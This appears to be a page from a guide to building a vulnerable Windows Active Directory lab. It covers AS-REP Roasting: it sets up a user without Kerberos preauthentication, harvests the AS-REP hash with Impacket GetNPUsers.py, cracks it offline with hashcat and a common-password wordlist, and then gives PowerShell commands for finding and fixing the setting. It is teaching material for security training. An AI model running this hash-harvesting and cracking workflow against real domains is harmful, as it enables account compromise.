# AS-REP Roasting ## Configuring ### Prerequisite {% content-ref url="" %} [](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/initial-access-attacks/username-enumeration) {% endcontent-ref %} ### Configuring 1. Login on `DC02` with the username `Administrator` and password `Welcome01!`. 2. Open the "Active Directory Users and Computers" administration tool on `DC02`. ![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FsPsuO7X8u9oZt5g95pEy%2Fimage.png?alt=media\&token=65e41b2b-f9c9-4ae1-8936-af488f7fcfd7) 3\. Click on "View" and enable "Advanced Features"

4\. Open "Employees", right click the user `Richard` and click on "Properties" ![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FPUkprWXbNU9XtxmEsNRU%2Fimage.png?alt=media\&token=867ee720-076c-4a21-b896-44271ad40773) 5\. Open "Account" and scroll to the bottom in "Account options", then select "Do not require kerberos preauthentication".

6\. Right click on `Richard` and select "Reset Password". Uncheck "User must change password at next logon" and fill in the password `Sample123`. Click on "OK"

## Attacking ### How it works When pre-authentication is not required, an attack can directly send a request for authentication. The KDC will return an encrypted TGT and the attacker can extract the hash and brute-force it offline. ### Tools * [Impacket GetNPUsers.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) ### Executing the attack 1. Make sure Impacket is installed and run the GetNPUsers.py tool with the users we enumerated earlier and saved in `users.txt`. The tool will check if any of the enumerated users doesn't require pre-authentication and will request a ticket which we can crack offline. ``` GetNPUsers.py amsterdam/ -dc-ip 10.0.0.3 -usersfile users.txt -format hashcat -outputfile asreproasting ``` ![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FCFX8hYbvxU275MZmLIPF%2Fimage.png?alt=media\&token=8bfbf2ff-38f5-4c69-af31-263a83aff703) 2\. The tool doesn't say anything about users that don't require pre-authentication. Check if the outputfile exists and cat it: ``` cat asreproasting ```

3\. The user `Richard` doesn't require pre-authentication and we have an hash from the TGT. Lets crack it with Hashcat and [this](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2020-200_most_used_passwords.txt) wordlist. The Hashcat parameters are: * Crackingmode: `-a 0` for using a wordlist * Hashmode: `-m 18200` for Kerberos 5, etype 23, AS-REP * List with hashes: `asreproasting` * Password list: `2020-200_most_used_passwords.txt` ``` wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2020-200_most_used_passwords.txt hashcat -a 0 -m 18200 asreproasting 2020-200_most_used_passwords.txt ``` ![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FwGu4De4NR1rb9IzZUHUv%2Fimage.png?alt=media\&token=6daa689d-a8cf-4571-acda-ae336fb13864) 4\. We successfully cracked the password. The password for `Richard` is `Sample123`. ## Defending ### Recommendations * Periodically check for users that don't require pre-authentication and remove the attribute. Check for users with the attribute: ``` Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select-Object samAccountName ``` Remove the attribute for a single user: ``` Set-ADAccountControl -DoesNotRequirePreAuth $false -Identity ``` Check for users with the attribute and remove it: ``` Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADAccountControl -DoesNotRequirePreAuth $false ``` ### Detection ## References {% embed url="" %}